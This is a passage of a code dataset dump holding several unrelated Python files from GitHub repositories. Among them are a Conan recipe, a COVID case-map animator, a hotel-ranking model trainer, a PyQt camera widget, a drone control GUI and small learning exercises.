tc.cache_variables[\"OPTION_BUILD_DOCS\"] = False\n tc.cache_variables[\"OPTION_BUILD_TOOLS\"] = False\n tc.cache_variables[\"OPTION_BUILD_EXAMPLES\"] = False\n tc.cache_variables[\"OPTION_BUILD_WITH_BOOST_THREAD\"] = False\n tc.cache_variables[\"OPTION_BUILD_CHECK\"] = False\n # TODO: might be a good idea to fix upstream CMakeLists to not rely on\n # WriteCompilerDetectionHeader, and just use cxx_std_11 compile feature\n tc.cache_variables[\"CMAKE_POLICY_DEFAULT_CMP0120\"] = \"OLD\"\n tc.generate()\n\n def _patch_sources(self):\n apply_conandata_patches(self)\n compile_options = os.path.join(self.source_folder, \"cmake\", \"CompileOptions.cmake\")\n cmakelists = os.path.join(self.source_folder, \"CMakeLists.txt\")\n # Don't force PIC\n replace_in_file(self, compile_options, \"POSITION_INDEPENDENT_CODE ON\", \"\")\n # Don't replace /W3 by /W4\n replace_in_file(self, compile_options, \"/W4\", \"\")\n # No whole program optimization\n replace_in_file(self, compile_options, \"/GL\", \"\")\n # Don't populate rpath\n replace_in_file(self, cmakelists, \"if(NOT SYSTEM_DIR_INSTALL)\", \"if(0)\")\n\n def build(self):\n self._patch_sources()\n cmake = CMake(self)\n cmake.configure()\n cmake.build()\n\n def package(self):\n copy(self, \"LICENSE\", src=self.source_folder, dst=os.path.join(self.package_folder, \"licenses\"))\n cmake = CMake(self)\n cmake.install()\n rmdir(self, os.path.join(self.package_folder, \"cmake\"))\n rmdir(self, os.path.join(self.package_folder, \"share\"))\n\n def package_info(self):\n self.cpp_info.set_property(\"cmake_file_name\", \"glbinding\")\n\n suffix = \"d\" if self.settings.build_type == \"Debug\" else \"\"\n # glbinding\n self.cpp_info.components[\"_glbinding\"].set_property(\"cmake_target_name\", \"glbinding::glbinding\")\n self.cpp_info.components[\"_glbinding\"].libs = [\"glbinding\" + suffix]\n self.cpp_info.components[\"_glbinding\"].requires = [\"khrplatform\"]\n if self.settings.os in [\"Linux\", \"FreeBSD\"]:\n self.cpp_info.components[\"_glbinding\"].system_libs = [\"dl\", \"pthread\"]\n # glbinding-aux\n self.cpp_info.components[\"glbinding-aux\"].set_property(\"cmake_target_name\", \"glbinding::glbinding-aux\")\n self.cpp_info.components[\"glbinding-aux\"].libs = [\"glbinding-aux\" + suffix]\n self.cpp_info.components[\"glbinding-aux\"].requires = [\"_glbinding\"]\n # KHRplatform\n self.cpp_info.components[\"khrplatform\"].set_property(\"cmake_target_name\", \"glbinding::KHRplatform\")\n self.cpp_info.components[\"khrplatform\"].libdirs = []\n\n # workaround to propagate all components in CMakeDeps generator\n self.cpp_info.set_property(\"cmake_target_name\", \"glbinding::glbinding-aux\")\n\n # TODO: to remove in conan v2 once cmake_find_package_* generators removed\n self.cpp_info.names[\"cmake_find_package\"] = \"glbinding\"\n self.cpp_info.names[\"cmake_find_package_multi\"] = \"glbinding\"\n self.cpp_info.components[\"_glbinding\"].names[\"cmake_find_package\"] = \"glbinding\"\n self.cpp_info.components[\"_glbinding\"].names[\"cmake_find_package_multi\"] = \"glbinding\"\n self.cpp_info.components[\"glbinding-aux\"].names[\"cmake_find_package\"] = \"glbinding-aux\"\n self.cpp_info.components[\"glbinding-aux\"].names[\"cmake_find_package_multi\"] = \"glbinding-aux\"\n self.cpp_info.components[\"khrplatform\"].names[\"cmake_find_package\"] = \"KHRplatform\"\n self.cpp_info.components[\"khrplatform\"].names[\"cmake_find_package_multi\"] = \"KHRplatform\"\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/glbinding/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":5308,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"13541055784","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 3 19:00:31 2020\n\n@author: fernando\n\"\"\"\n\ndef MapaCOVID(Provincia, fecha):\n \"\"\"\n Hace una animacion\n \"\"\"\n \n \n ###################### CARGA MAPA ###################################\n if Provincia==\"AMBA\":\n MapaProv=geopandas.read_file(\"Data/GeoData/AMBA.json\")\n MapaProv.insert(9, \"Infectados\", 0.0)\n MapaProv.index=MapaProv.in1\n elif Provincia==\"Todas\":\n MapaCABA=geopandas.read_file(\"Data/GeoData/AMBA.json\").loc[0]\n MapaProv=geopandas.read_file(\"Data/GeoData/departamento.json\")\n MapaProv=MapaProv[[not h[:2]=='02' for h in MapaProv.in1]]\n MapaCABA.in1='02000'\n MapaProv=MapaProv.append(MapaCABA)\n MapaProv.insert(9, \"Infectados\", 0.0)#isertar columna nueva\n MapaProv.index=MapaProv.in1\n else:\n Arg=geopandas.read_file(\"Data/GeoData/departamento.json\")\n CodProv=str(codigo.Cod[Provincia]).zfill(2)\n MapaProv=Arg[[h[:2]==CodProv for h in Arg['in1']]]\n MapaProv.insert(9, \"Infectados\", 0.0)#isertar columna nueva\n MapaProv.index=MapaProv.in1\n\n ###################### CARGA DATOS #####################################\n DataProv=readDataArg(Provincia)\n I1=DataProv.fecha_apertura>=fecha[0]\n I2=DataProv.fecha_apertura<=fecha[1]\n DataProv=DataProv[I1 & I2]\n \n \n# if Provincia==\"AMBA\":\n# #DataProv[DataProv.residencia_provincia_nombre=='CABA']\n# CasosCABA=len(DataProv[DataProv.residencia_provincia_nombre=='CABA'])\n# MapaProv.at['02',\"Infectados\"]=CasosCABA\n# DataProv=DataProv[DataProv.residencia_provincia_id==6]\n# DataI=DataProv.residencia_departamento_id.value_counts()\n# for h in DataI.index:\n# #if not(h==0):\n# id='06'+str(h).zfill(3)\n# MapaProv.at[id,\"Infectados\"]=DataI[h]\n# elif Provincia==\"Todas\":\n# InfCABA=DataProv.residencia_provincia_nombre.value_counts()['CABA']\n# MapaProv.at['02000','Infectados']=InfCABA\n# I=[not h=='CABA' for h in DataProv.residencia_provincia_nombre]\n# DataProv=DataProv[I]\n# \n# I1=DataProv.residencia_provincia_id.apply(str).str.zfill(2)\n# I2=DataProv.residencia_departamento_id.apply(str).str.zfill(3)\n# DataProv.at[:,'id']=I1+I2\n# \n# DataI=DataProv.id.value_counts()\n# \n# for h in DataI.index:\n# MapaProv.at[h,\"Infectados\"]=DataI[h]\n# \n# else:\n \n ############ pARA OTRAS PROVINCIAS ESTO VENIA DESPUES DEL ELSE\n\n\n I=datetimeIterator(pd.to_datetime(fecha[0]),pd.to_datetime(fecha[1]))\n\n\n i=0\n for fecha_foto in I:\n MapaProv.loc[:,\"Infectados\"]=0.0\n I1=DataProv.fecha_apertura<=str(fecha_foto)[:10]\n DataI=DataProv[I1].residencia_departamento_id.value_counts()\n for h in DataI.index:\n id=CodProv+str(h).zfill(3)\n MapaProv.at[id,\"Infectados\"]=2*DataI[h]\n MapaProv_points = MapaProv.copy()\n MapaProv_points['geometry'] = MapaProv_points['geometry'].centroid \n fig=plt.figure(figsize=(8,10))\n ax=fig.add_axes([0,0.01,1,.95])\n MapaProv.plot(ax=ax, color=\"white\", edgecolor=\"grey\", linewidth=2)\n MapaProv_points.plot(ax=ax,color=\"#e63131\", markersize=\"Infectados\",\n alpha=0.7, categorical=False, legend=True )\n \n titulo=str(fecha_foto)[:10]\n \n file_name=str(i).zfill(3)+'.png'\n ax.set_title(titulo,fontsize=20)\n ax.axes.xaxis.set_visible(False)\n ax.axes.yaxis.set_visible(False)\n plt.savefig(file_name)\n plt.close()\n i=i+1\n \n return []\n \n \n\ndef readDataArg(Provincia):\n \"\"\"\n Lee datos de la base descargada del ministerio de salud de la República \n Argentina.\n \n Parametros:\n Provincia: string, provincia Argentina.\n retorna:\n Pandas DataFrame. con todos las columnas de la base original.\n \"\"\"\n \n \n Data=pd.read_csv(\"Data/Epidemic/Covid19Casos.csv\")\n Data=Data[Data.clasificacion_resumen==\"Confirmado\"]\n if Provincia=='AMBA':\n DataAMBA=geopandas.read_file('Data/GeoData/AMBA.json')\n #Primer datos es CABA lo leere de otra forma\n I1=[int(i[2:]) for i in DataAMBA.in1.values[1:]]\n I2=Data['residencia_provincia_id']==6\n I3=Data['residencia_departamento_id'].isin(I1)\n I4=Data['residencia_provincia_id']==2\n I= (I3 & I2) | I4 \n\n DataProv=Data.loc[I]\n elif Provincia==\"Todas\":\n DataProv=Data\n else:\n CodProv=codigo.Cod[Provincia]\n I=Data.residencia_provincia_id==CodProv \n DataProv=Data[I] \n return DataProv\n\ndef datetimeIterator(from_date=datetime.now(), to_date=None):\n while to_date is None or from_date <= to_date:\n yield from_date\n from_date = from_date + timedelta(days = 1)\n return\n\n################# LIBRERIAS ###############################################\nimport pandas as pd\nimport geopandas\nimport matplotlib.pyplot as plt\n#from mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom matplotlib import cm\nimport numpy as np\n#from shapely.geometry import Point, Polygon\nfrom datetime import datetime,timedelta\n\n\n################# Vriables Globales ##########################################\n\n\n\n###################### CODIGOS DE PROVINCIA ##################################\ncodigo=pd.read_csv('Data/GeoData/CodProv.csv')\ncodigo.index=codigo.Provincia","repo_name":"fdmazzone/COVID-19","sub_path":"Modelizacion_Pandemia_Real/programas/animacion.py","file_name":"animacion.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22029165237","text":"from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor, AdaBoostRegressor\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.datasets import make_friedman1\nfrom sklearn.metrics import mean_squared_error\nimport sklearn.model_selection as ms\nimport sklearn.feature_extraction as fe\n\nimport pandas as pd\nfrom matplotlib import rcParams\nimport matplotlib.pyplot as plt\nimport pickle\nimport util.plot\nimport util.data\nimport util.ndcg\nimport numpy as np\nfrom pandas.plotting import scatter_matrix\nimport sklearn.model_selection as ms\n\n\ndata = pd.read_csv('data/training_set_VU_DM_clean.csv', sep=';')\ncolumns = list(data.columns)\nsrchIdList = np.unique(data['srch_id'])\ntrainID, testID = ms.train_test_split(srchIdList, random_state=42, test_size=0.4)\ntrain = data[data['srch_id'].isin(trainID)]\ntest = data[data['srch_id'].isin(testID)]\n#train, test = ms.train_test_split(data, random_state=42, test_size=0.3)\nyLab = list(['click_bool', 'booking_bool', 'score', 'position'])\ntrainY = train[yLab]\ntrainX = train.drop(yLab, axis=1)\ntestY = test[yLab]\n\ntestX = test.drop(yLab, axis=1)\n\nnp.random.seed(424242)\n\nbools = [k for k in list(trainX.columns) if 'bool' in k]\nisNulls = [k for k in list(trainX.columns) if 'is_null' in k]\nweekDays = ['Friday',\n 'Monday',\n 'Saturday',\n 'Sunday',\n 'Thursday',\n 'Tuesday',\n 'Other']\nweekDays = ['weekday_' + k for k in weekDays]\ncomps = ['unavailable_comp',\n 'available_comp',\n 'avg_price_comp']\notherSelection = ['has_historical_price',\n # 'travel_distances',\n 'delta_starrating',\n 'srch_query_affinity_score',\n 'price_usd',\n 'promotion_flag',\n 'prop_location_score1',\n 'prop_location_score2',\n 'srch_adults_per_room_score',\n 'srch_person_per_room_score']\ndateTimes = ['day',\n 'hour']\nvarsUsed = bools + isNulls + weekDays + comps + otherSelection\n# varsUsed = ['visitor_hist_starrating',\n# 'visitor_hist_adr_usd',\n# 'prop_starrating',\n# 'prop_review_score',\n# 'prop_brand_bool',\n# 'prop_location_score1',\n# 'prop_location_score2',\n# 'prop_log_historical_price',\n# 'price_usd',\n# 'promotion_flag',\n# 'srch_length_of_stay',\n# 'srch_booking_window',\n# 'srch_adults_count',\n# 'srch_children_count',\n# 'srch_room_count',\n# 'srch_saturday_night_bool',\n# 'srch_query_affinity_score',\n# 'visitor_hist_starrating_is_null',\n# 'day',\n# 'hour',\n# 'srch_person_per_room',\n# 'Friday',\n# 'Monday',\n# 'Saturday',\n# 'Sunday',\n# 'Thursday',\n# 'Tuesday']\n\n# start training models below\n\nfor k in varsUsed:\n if k not in trainX.columns:\n print(k)\n varsUsed.remove(k)\n\nest = GradientBoostingRegressor(n_estimators=100, learning_rate=0.1,\n max_depth=1, random_state=0, loss='ls').fit(trainX[varsUsed], trainY)\nprint(mean_squared_error(testY, est.predict(testX[varsUsed])))\nest.feature_importances_\n\nrfest = RandomForestClassifier(n_estimators=100, max_depth=2, random_state=0)\nrfest.fit(trainX[varsUsed], trainY[list(['click_bool', 'booking_bool'])])\na4 = rfest.predict(testX[varsUsed])\nprint(mean_squared_error(testY['click_bool']+5*testY['booking_bool'], a4[:,0]+5*a4[:,1] ))\na2 = rfest.predict(testX[varsUsed])\nrfest_tuned_parameters = [{'max_depth':[1,2,4,5],'n_estimators':[50,100,150,200,300]}]\nrfestGS = ms.GridSearchCV(RandomForestClassifier(),rfest_tuned_parameters,cv=5,scoring='neg_mean_squared_error')\nrfestGS.fit(trainX[varsUsed],trainY[list(['click_bool', 'booking_bool'])])\n\nrfReg = RandomForestRegressor(n_estimators=100)\nrfReg.fit(trainX[varsUsed], trainY['score'])\na3 = rfReg.predict(testX[varsUsed])\nprint(mean_squared_error(testY['score'], est.predict(testX[varsUsed])))\nrfreg_tuned_parameters = [{'max_depth':[1,2,3],'n_estimators':[50,100,150,200]}]\nrfregGS = ms.GridSearchCV(RandomForestRegressor(),rfreg_tuned_parameters,cv=5,scoring='neg_mean_squared_error')\nrfregGS.fit(trainX[varsUsed],trainY['score'])\na1 = ms.ParameterGrid(rfreg_tuned_parameters)\nscoresave = np.zeros(len(a1))\nfor i in range(len(a1)):\n rfregmgs = RandomForestRegressor(**a1[i])\n rfregmgs.fit(trainX[varsUsed],trainY['score']) \n y_pred = rfregmgs.predict(testX[varsUsed])\n ndcg = util.ndcg.ndcg(testX[['srch_id','prop_id']], testY['score'], y_pred)\n ndcg\n scoresave[i] = ndcg\n \nadaReg = AdaBoostRegressor()\nadaReg.fit(trainX[varsUsed],trainY['score'])\nprint(mean_squared_error(testY['score'],adaReg.predict(testX[varsUsed])))\nada_tuned_parameters = [{'loss':['linear','square'],'learning_rate':[0.5,1,2],'n_estimators':[50,100,150,25]}]\nadaGS = ms.GridSearchCV(AdaBoostRegressor(),ada_tuned_parameters,cv=5,scoring='neg_mean_squared_error')\nadaGS.fit(trainX[varsUsed],trainY['score'])\nprint(adaGS.score(testY['score'],adaGS.predict(testX[varsUsed])))\nprint(adaGS.best_params_)\nprint(adaGS.best_score_)\n#predMat = pd.DataFrame()\n\nrfReg = RandomForestRegressor(n_estimators=100)\nrfReg.fit(trainX[varsUsed], trainY['score'])\nest = GradientBoostingRegressor(n_estimators=100, learning_rate=0.1,\n max_depth=1, random_state=0, loss='ls').fit(trainX[varsUsed], trainY['score'])\n\nadaTestX = testX[['srch_id','prop_id']]\nadaTestY = testY\nadaTestY['srch_id'] = testX['srch_id']\nadaTestX['score'] = adaReg.predict(testX[varsUsed])\n# sort test set predicted scores from high scores to low scores\nadaTestX = adaTestX.iloc[1:100000,:]\nadaTestY = adaTestY.iloc[1:100000,:]\n\nadaTestX = adaTestX.sort_values(['srch_id', 'score'], ascending=[True, False])\n\n# create new column to store position of prop_id\nadaTestX['position'] = pd.Series()\n\n\n\n\n# fit model to test set\ny_pred = adaReg.predict(testX[varsUsed])\n# X_test['score'] = preds\n\n\n# calculate dcg of test set per srch_id\nXy_pred = util.data.Xy_pred(testX[['srch_id','prop_id']], y_pred)\n\n# put true y values on indexes, do not sort !\nXy_pred['score'] = testY['score']\n\n# calculate ideal dcg of test set per srch_id\nXy_true = util.data.Xy_pred(testX[['srch_id','prop_id']], testY['score'])\n\n# calculate NDCG\nndcg = util.ndcg.ndcg(testX[['srch_id','prop_id']], testY['score'], y_pred)\nndcg\n\n\n\n\n\nfinalTestSet = pd.read_csv('data/test_set_VU_DM_clean-001.csv', sep=';')\nfinaltestPred = est.predict(finalTestSet[varsUsed])\nfinalFrame = finalTestSet[['srch_id','prop_id']]\nfinalFrame['scores'] = finaltestPred\nfinalFrame = finalFrame.sort_values(['srch_id','scores'], ascending=[True,False])\nfinalFrame = finalFrame.drop(['scores'],axis=1)\nfinalFrame.to_csv('data/FinalPreds.csv',index=False)\n\n\n\n\n\n\n\n'''\n# save position prop_id\nprev_srch_id = -1\nfor i in adaTestX.index.tolist():\n row = adaTestX.loc[i]\n # compute position\n if prev_srch_id != row.srch_id:\n position = 1\n prev_srch_id = row.srch_id\n else:\n position += 1\n \n # save position value to X_test\n adaTestX.loc[i, 'position'] = int(position)\n\n # to calculate the DCG of the test set old scores have to be used instead of the predicted scores\n adaTestX.loc[i, 'score'] = testY.loc[i, 'score']\n \n# X_test\n# determine ideal positions for test set with the 'real' scores, later the ideal DCG for the test set can be determined\nadaTestY = adaTestY.sort_values(['srch_id', 'score'], ascending=[True, False])\nadaTestY['position'] = pd.Series()\nprev_srch_id = -1\nfor i in adaTestY.index.tolist():\n row = adaTestY.loc[i]\n # compute position\n if prev_srch_id != row.srch_id:\n position = 1\n prev_srch_id = row.srch_id\n else:\n position += 1\n\n # save value to X_test\n adaTestY.loc[i, 'position'] = int(position)\n\n# calculate dcg of test set per srch_id\nndcg_test = util.data.DCG_dict(adaTestX)\n\n# calculate ideal dcg of test set per srch_id\nndcg_control = util.data.DCG_dict(adaTestY)\n\n# calculate means of both dcg dictionaries\nprint(np.mean(list(ndcg_test.values())))\nprint(np.mean(list(ndcg_control.values())))\n\n# normalize\nndcg = np.mean(list(ndcg_test.values())) / np.mean(list(ndcg_control.values()))\nndcg\n'''\n\n","repo_name":"voschezang/Data-Mining","sub_path":"model_training.py","file_name":"model_training.py","file_ext":"py","file_size_in_byte":8369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71223130170","text":"from itertools import product\n# product 중복조합 : iterable객체에서 r개의 데이터를 뽑아 일렬로 나열하는 모든 경우의 수\n# 다만 원소를 중복하여 뽑는다\n# 뽑고자 하는 데이터 수를 repeat 속성 값으로 넣어준다\n\ndata = ['A', 'B', 'C']\n\nresult = list( product(data, repeat=2) ) # 2개를 뽑는 모든 조합 구하기(중복 허용)\n\nprint(result)\n\n'''출력 결과: [('A', 'A'), ('A', 'B'), ('A', 'C'), ('B', 'A'), ('B', 'B'), ('B', 'C'), ('C', 'A'), ('C', 'B'), ('C', 'C')]'''\n","repo_name":"confettimimy/Python-for-coding-test","sub_path":"주요 라이브러리/itertools/product 중복 순열.py","file_name":"product 중복 순열.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"996961766","text":"import logging\nfrom collections import deque\n\nfrom PyQt5.QtCore import QThread\nfrom PyQt5.QtWidgets import QFrame\n\nfrom ...datastream import JetImageFeed\nfrom ..widgets.editorWidgetUi import Editor_Ui\n\nlog = logging.getLogger(__name__)\n\n\nclass EditorWidget(QFrame, Editor_Ui):\n\n def __init__(self, context, signals):\n super().__init__()\n self.signals = signals\n self.context = context\n self.setupUi(self)\n self.thread1 = QThread()\n self.worker_image = JetImageFeed()\n self.sliders = {'dilate': deque([None], 5),\n 'erode': deque([None], 5),\n 'open': deque([None], 5),\n 'close': deque([None], 5),\n 'brightness': deque([None], 5),\n 'contrast': deque([None], 5),\n 'blur': deque([None], 5),\n 'left threshold': deque([110], 5),\n 'right threshold': deque([255], 5)}\n self.make_connections()\n self.dilate_off_on(True)\n self.open_off_on(True)\n self.signals.initializeCamValues.emit()\n\n def make_connections(self):\n self.signals.terminateAll.connect(self.terminate_all)\n self.bttngrp1.buttonClicked.connect(self.check_button)\n self.bttn_cam_connect.clicked.connect(self.start_cam)\n self.bttn_cam_disconnect.clicked.connect(self.stop_cam)\n self.bttn_cam_calibrate.clicked.connect(self.calibrate)\n self.bttn_search.clicked.connect(self.search)\n self.signals.message.connect(self.display_message)\n self.bttn_reset_all.clicked.connect(self.reset_all)\n self.rd_bttn_dilate.clicked.connect(self.dilate_off_on)\n self.rd_bttn_erode.clicked.connect(self.erode_off_on)\n self.rd_bttn_open.clicked.connect(self.open_off_on)\n self.rd_bttn_close.clicked.connect(self.close_off_on)\n self.slider_dilate.sliderMoved.connect(self.set_dilate)\n self.slider_erode.sliderMoved.connect(self.set_erode)\n self.slider_open.sliderMoved.connect(self.set_open)\n self.slider_close.sliderMoved.connect(self.set_close)\n self.slider_brightness.sliderMoved.connect(self.set_brightness)\n self.slider_contrast.sliderMoved.connect(self.set_contrast)\n self.slider_blur.sliderMoved.connect(self.set_blur)\n self.range_slider_thresh.left_thumb_value_changed.connect(\n self.set_left_threshold)\n self.range_slider_thresh.right_thumb_value_changed.connect(\n self.set_right_threshold)\n self.worker_image.moveToThread(self.thread1)\n self.worker_image.init_after_move(self.context, self.signals)\n self.thread1.started.connect(self.worker_image.start_comm)\n self.thread1.start()\n\n def start_cam(self):\n self.worker_image.connect_cam()\n if self.worker_image.connected:\n self.signals.startImageThread.emit()\n else:\n self.signals.message.emit(\"The image could not connect...\")\n\n def stop_cam(self):\n if not self.worker_image.paused:\n self.signals.stopImageThread.emit(False)\n\n def check_button(self, bttn):\n bttn = bttn.text()\n if bttn == \"COM detection off\":\n self.context.set_com_on(False)\n if bttn == \"COM detection on\":\n self.context.set_com_on(True)\n\n def calibrate(self):\n if self.worker_image.connected and not self.worker_image.paused:\n self.context.calibrate_image()\n else:\n self.signals.message.emit(\"The image feed is not live or the\"\n \"application is stopped try to connect\"\n \"camera\")\n\n def search(self):\n self.context.run_image_search()\n\n def reset_all(self):\n self.sliders = {'dilate': deque([None], 5),\n 'erode': deque([None], 5),\n 'open': deque([None], 5),\n 'close': deque([None], 5),\n 'brightness': deque([None], 5),\n 'contrast': deque([None], 5),\n 'blur': deque([None], 5),\n 'left threshold': deque([110], 5),\n 'right threshold': deque([255], 5)}\n self.signals.imageProcessing.emit(self.sliders)\n\n def display_message(self, message):\n pt = self.text_area.toPlainText()\n if pt.split('\\n')[-1] == message.split('\\n')[-1]:\n pass\n else:\n self.text_area.append(message)\n\n def set_dilate(self, v):\n self.sliders['dilate'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def set_erode(self, v):\n self.sliders['erode'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def set_open(self, v):\n self.sliders['open'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def set_close(self, v):\n self.sliders['close'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def set_contrast(self, v):\n self.sliders['contrast'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def set_brightness(self, v):\n self.sliders['brightness'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def set_blur(self, v):\n self.sliders['blur'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def set_left_threshold(self, v):\n self.sliders['left threshold'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def set_right_threshold(self, v):\n self.sliders['right threshold'].append(v)\n self.signals.imageProcessing.emit(self.sliders)\n\n def dilate_off_on(self, enabled):\n self.slider_dilate.setEnabled(enabled)\n p = self.slider_dilate.sliderPosition()\n self.sliders['dilate'].append(p)\n self.rd_bttn_erode.setChecked(not enabled)\n self.slider_erode.setEnabled(not enabled)\n self.sliders['erode'].append(None)\n self.signals.imageProcessing.emit(self.sliders)\n\n def erode_off_on(self, enabled):\n self.slider_erode.setEnabled(enabled)\n p = self.slider_erode.sliderPosition()\n self.sliders['erode'].append(p)\n self.rd_bttn_dilate.setChecked(not enabled)\n self.slider_dilate.setEnabled(not enabled)\n self.sliders['dilate'].append(None)\n self.signals.imageProcessing.emit(self.sliders)\n\n def open_off_on(self, enabled):\n self.slider_open.setEnabled(enabled)\n p = self.slider_open.sliderPosition()\n self.sliders['open'].append(p)\n self.rd_bttn_close.setChecked(not enabled)\n self.slider_close.setEnabled(not enabled)\n self.sliders['close'].append(None)\n self.signals.imageProcessing.emit(self.sliders)\n\n def close_off_on(self, enabled):\n self.slider_close.setEnabled(enabled)\n p = self.slider_close.sliderPosition()\n self.sliders['close'].append(p)\n self.rd_bttn_open.setChecked(not enabled)\n self.slider_open.setEnabled(not enabled)\n self.sliders['open'].append(None)\n self.signals.imageProcessing.emit(self.sliders)\n\n def terminate_all(self):\n self.signals.stopImageThread.emit(True)\n self.thread1.quit()\n self.thread1.wait()\n","repo_name":"pcdshub/jet_tracking","sub_path":"jet_tracking/gui/widgets/editorWidget.py","file_name":"editorWidget.py","file_ext":"py","file_size_in_byte":7365,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"4244975368","text":"inv_sum = input (\"please write a sum which you planed to invest for deposit: \")\r\nlist_of_inv_sum = inv_sum.split()\r\nlist_of_numbers = list(map(int, list_of_inv_sum))\r\nper_cent = {'ТКБ': 5.6, 'СКБ': 5.9, 'ВТБ': 4.28, 'СБЕР': 4.0}\r\nx0 = per_cent['ТКБ']\r\nx1 = per_cent['СКБ']\r\nx2 = per_cent['ВТБ']\r\nx3 = per_cent['СБЕР']\r\ndepo_0 = list_of_numbers[0] * (x0 / 100)\r\ndepo_1 = list_of_numbers[0] * (x1 / 100)\r\ndepo_2 = list_of_numbers[0] * (x2 / 100)\r\ndepo_3 = list_of_numbers[0] * (x3 / 100)\r\nlist_delta_depos = [depo_0, depo_1, depo_2, depo_3]\r\nprint(list_delta_depos)\r\n\r\nmax_number = max(list_delta_depos)\r\nprint(\"Наибольшее число:\", max_number)","repo_name":"Oniblake/QAP74","sub_path":"HW-03.py","file_name":"HW-03.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29175091102","text":"from time import sleep\nfrom tkinter.constants import TRUE # 슬립 라이브러리\nfrom e_drone.drone import * # 드론 라이브러리\nfrom e_drone.protocol import *\nfrom serial.tools.list_ports import comports # 포트 번호 가져올 수 있는 라이브러리\nfrom aidrone_function import * # 내가 지정한 함수들\nimport turtle as t\nfrom PIL import ImageTk, Image\nimport tkinter\nimport tkinter.font, tkinter.ttk\nimport threading \n\n\n\n\ndef updateTemp():\n while True:\n global label1, label2\n Height = getHeight()\n cAltitude = getAltitude()\n label1.config(text= '%.2f m'%(Height))\n label2.config(text= '%.2f m'%(cAltitude))\n #print(\"window !!!!! : \"+str(getHeight()) + \" \" + str(getAltitude()))\n time.sleep(0.01)\n\n\ndef go1Click(drone):\n t = threading.Thread(target = GO_1, args =(drone,tt))\n t.start()\n\n\ndef go2Click(drone):\n t = threading.Thread(target = GO_2, args =(drone,tt))\n t.start()\n\n\ndef go3Click(drone):\n t = threading.Thread(target = GO_3, args =(drone,tt))\n t.start()\n\n\nif __name__ == '__main__':\n portName = searchPort()\n\n drone = Drone()\n drone.open(\"COM7\") # 컨트롤러와 연결된 포트 번호\n setTrim(drone) # 시작 전 Trim 초기화\n setEvent(drone) # EventHandler 세팅 (Altitude와 Attitude)\n\n\n\n \n\n #GUI\n window = tkinter.Tk()\n window.geometry(\"900x650\")\n window.resizable(TRUE, TRUE)\n\n #미션 1,2,3\n btn1 = tkinter.Button(window, text = 'Go 1', width = 20, height= 2, relief = 'solid', command=lambda : go1Click(drone))\n btn2 = tkinter.Button(window, text = 'Go 2', width = 20, height= 2, relief = 'solid', command=lambda : go2Click(drone))\n btn3 = tkinter.Button(window, text = \"Go 3\", relief = 'solid', width = 20, height= 2, command=lambda : go3Click(drone))\n btn1.place(x = 30, y =20)\n btn2.place(x = 370, y = 20)\n btn3.place(x = 720, y = 20)\n\n ##캔버스 배치를 위한 프레임##\n cframe=tkinter.Frame(window, background=\"white\",width = 850, height= 450)\n canvas = tkinter.Canvas(master = cframe,width = 850, height= 450)\n p = t.TurtleScreen(canvas)\n cframe.place(x = 20, y = 100)\n canvas.pack() \n #거북이 객체\n tt = t.RawTurtle(p)\n # img = ImageTk.PhotoImage(Image.open('drone_img.png'))\n # t.register_shape(\"Pic\",Shape(\"image\",img))\n # tt.shape(\"Pic\")\n\n\n\n \n\n #글씨체\n font1 = tkinter.font.Font(family=\"맑은 고딕\", size=20 , weight = \"bold\")\n font2 = tkinter.font.Font(family=\"맑은 고딕\", size=11 , weight = \"bold\")\n\n # 높이\n label3 = tkinter.Label(window, text = \" 현재 높이 : \", font = font1)\n label4 = tkinter.Label(window, text = \" 고도 : \", font = font2)\n label1 = tkinter.Label(window,text = '0.0', font = font1)\n label2 = tkinter.Label(window,text = '0.0', font = font2)\n label3.place(x=530,y=560)\n label1.place(x=770,y=560)\n label4.place(x=700,y=610)\n label2.place(x=800,y=610)\n\n threading.Thread(target=updateTemp, daemon=True).start()\n\n window.mainloop()\n #GO_3(drone)\n\n\n\n drone.close()\n","repo_name":"PangRAK/team-python-aidrone","sub_path":"project_files/aidrone_main.py","file_name":"aidrone_main.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37702665371","text":"#Extracting Data from JSON by Mitul\nimport json\nimport urllib.request\ncount = 0\n\nurl = input(\"Give Actual Data or Website Link\")\nprint (\"retrieving URL. Stand by.\")\nuh = urllib.request.urlopen(url)\ndata= uh.read()\n\ninfo = json.loads(data)\nfor item in info[\"comments\"]:\n\t#print item[\"count\"]\n\tnumber = int(item[\"count\"])\n\tcount = count + number\nprint( count)\n\n\n'''Output;\nGive Actual Data or Website Link>? http://py4e-data.dr-chuck.net/comments_450130.json\nretrieving URL. Stand by.\n2870'''\n","repo_name":"mitul3737/Using-Python-to-Access-Web-Data","sub_path":"Extracting Data from JSON.py","file_name":"Extracting Data from JSON.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 